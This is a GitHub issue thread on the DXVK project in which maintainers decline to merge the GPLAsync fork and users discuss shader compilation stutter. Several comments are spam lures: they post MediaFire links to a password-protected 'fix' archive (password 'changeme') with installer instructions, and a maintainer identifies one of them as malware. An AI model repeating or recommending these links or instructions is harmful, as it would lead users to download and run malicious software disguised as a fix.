### ISSUE TITLE
GPLASync Support

### ISSUE THREAD

**Issue by shoober420** [doitsujin/dxvk#4221]
Any chance to merge GPLASync support?

https://gitlab.com/Ph42oN/dxvk-gplasync/

**Comment by K0bin** [comment]
No.

**Comment by Blisto91** [comment]
To expand at bit on that.
The very original Async work came from this repository long ago but was pulled for various reasons. The devs also since believe it isn't the correct way to handle the issue as it is a bit of a hack.
So while people are free to use the fork there sint any interest in having it in this dxvk.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Joshua-Ashton** [comment]
deleted comment of random malware

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by K0bin** [comment]
Another one.

**Comment by brad86m** [comment]
Sad reality is, shader compilation stutter is still a dealbreaker for many of us in PC gaming. It makes the experience of playing games pretty dreadful. Async DXVK forks are essential. I'll take any potential small inaccuracies than constant compilation stutter. 

Hopefully it does make a return to normal DXVK in the future, as without it, I personally won't ever use normal.
